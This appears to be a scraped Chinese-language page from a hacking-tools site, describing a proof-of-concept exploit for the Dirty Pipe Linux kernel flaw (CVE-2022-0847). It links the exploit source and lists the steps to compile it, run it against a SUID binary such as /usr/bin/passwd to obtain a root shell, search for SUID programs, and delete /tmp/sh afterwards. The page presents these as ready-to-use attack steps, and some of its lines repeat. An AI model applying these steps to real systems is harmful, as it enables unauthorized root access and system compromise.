黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对CVE-2022-0847(Dirty Pipe)的概念验证漏洞利用代码,通过SUID二进制操纵在Linux内核上实现本地权限提升。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
来源:https://www.exploit-db.com/exploits/50808
编译
在linux中 gcc -o dirty dirty.c编译POC程序
gcc -o dirty dirty.c
使用
./dirty SUID执行程序。其中,SUID是指具有SUID的程序的路径
./dirty SUID
一般可以用 /usr/bin/passwd,也就是执行./dirty /usr/bin/passwd
/usr/bin/passwd
./dirty /usr/bin/passwd
可以获取root的shell
可以使用find / -perm /4000查询具有SUID的程序。
find / -perm /4000
别忘了删除 /tmp/sh
/tmp/sh